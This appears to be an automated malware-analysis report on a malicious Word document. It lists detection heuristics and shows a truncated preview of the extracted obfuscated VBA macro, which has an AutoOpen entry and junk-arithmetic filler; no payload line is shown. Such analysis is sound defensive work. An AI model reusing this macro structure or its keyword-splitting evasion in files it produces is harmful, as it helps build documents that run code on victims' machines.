MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 System Binary Proxy Execution: Rundll32
The sample is a malicious Office document containing obfuscated VBA macros. The macros utilize GetObject and CreateObject to interact with WMI (winmgmts:) to launch a process, indicating an attempt to execute arbitrary code. This is a common technique for downloading and executing further stages of malware.
Heuristics 8
-
ClamAV: Doc.Downloader.00536d-6940733-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.00536d-6940733-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58498 bytes |
SHA-256: db36abe1943a4bf486d2fc51b751fef306f467e48cef52edfd451ac49ff8a292 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "VDBGABcZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AAAUXQcA"
Attribute VB_Base = "0{41B80301-4F30-4DFF-9E13-FF01FAAE48FC}{D3CACD97-8909-4E1C-A8B5-B5BB877E6850}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UAC4AA"
Attribute VB_Base = "0{189A0FF8-4D96-4B19-97D3-01F9E2211D01}{F88DC55B-ECC5-41AE-8FAD-B6A803EAC6A8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "hAAAQA"
Sub autoopen()
If CABxZA = zZQXZADA Then
Select Case KAAU4x_D
Case 824423980
JGQxCX11 = 541953637
B1_AQAA = ZBkw4cDU
WAACAAw = Asc(197431235 + Log(566296674 - Rnd(SAoAQC)) / 230159009 + Oct(361161562))
Case 260274818
iQDABA = rBQcGQkD
bQw4UkG = rxkDABA
dXwAA4U = CDate(507087702 - Cos(582724791 * Rnd(930168264) + 184544308 * 198050860) * dAAXAAA / Round(240484163))
Case 954027194
dAUwZkQ1 = YXAA4oXQ
OAABAQ = CStr(687146031)
dAwAAw = Atn(693080714 + Atn(8532107) * qAoAAD * CDate(WAA4Uw + 36 + UZAQCA_ / CStr(XA14ZA)))
End Select
End If
If UAZw4Z = PAAkUwU Then
Select Case MGAA_4wU
Case 662399757
fADAAAA = 886185252
fA4DQ4B = AUQAAxD
m1ACxUxZ = Asc(561466704 + Log(82608497 - Rnd(uQAAAxA)) / 80918609 + Oct(687553194))
Case 998728333
O_AAcAwA = HZAGAAA
nACko4 = zAQAAo
bBCZkBAA = CDate(507539159 - Cos(383013148 * Rnd(424800738) + 346047071 * 961173696) * BUCAUAD1 / Round(466825800))
Case 324182574
o4AU4A = SDQAAA
ZX1A4AQ = CStr(839175312)
jDXAZX = Atn(957733703 + Atn(592807201) * ScA4c1Z * CDate(BAcAAQ1 + 36 + icB14DAA / CStr(f4cA1A)))
End Select
End If
If NABA4GXQ = DADAUBAA Then
Select Case vAQAXA
Case 811608193
SUAZBDA = 203267347
XDUAGACx = iABGcxkA
XBcXAUAw = Asc(252737846 + Log(853717231 - Rnd(lAAAwAk)) / 702600719 + Oct(252830482))
Case 112938340
wDQAQBC = ZQ4DZo1X
iUxQGABA = rGAZQA
vUAoccw4 = CDate(736973785 - Cos(45942889 * Rnd(723496360) + 936787964 * 841547363) * RQAAQBA / Round(680824439))
Case 38404462
rAwkQwQA = SUUxAA
DD1AAcUA = CStr(349544721)
zxDwDAAU = Atn(626779698 + Atn(494500476) * VwZcAxA * CDate(QoCA4ZAw + 36 + tAA1ccZA / CStr(hc1BCoDA)))
End Select
End If
fACBDG4A
If BCAZAG = uCX1BG4Q Then
Select Case aBA4oAAA
Case 237027961
J1AcAAU = 725651001
JAUBBUkB = iAA4DxAD
bADUUAA = Asc(297422216 + Log(719513665 - Rnd(pAxABA)) / 744389716 + Oct(303320506))
Case 438840034
DAxAAQ = z1ACAA
GAABBC = Jw1Q1UQG
TBUABZG = CDate(601632226 - Cos(233712794 * Rnd(916568828) + 167053570 * 107627104) * JUAUkCw / Round(126606403))
Case 668598851
qADB1ZcA = pAAAAAw
jDAUABD = CStr(408859490)
LAXAAQAB = Atn(764118703 + Atn(937464247) * wAXUA1 * CDate(qcAxBA + 36 + oAwDADA / CStr(YABBB_Q)))
End Select
End If
If wGBkAX = uQQUXUAA Then
Select Case wAAB4wAQ
Case 294513077
aA_Q4B = 479579391
iABUBA = GAACZkAA
DAUGoXB = Asc(375555191 + Log(615128457 - Rnd(iBcCAk)) / 337159818 + Oct(867101891))
Case 561078452
iAAwAwxA = qZA4DA
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.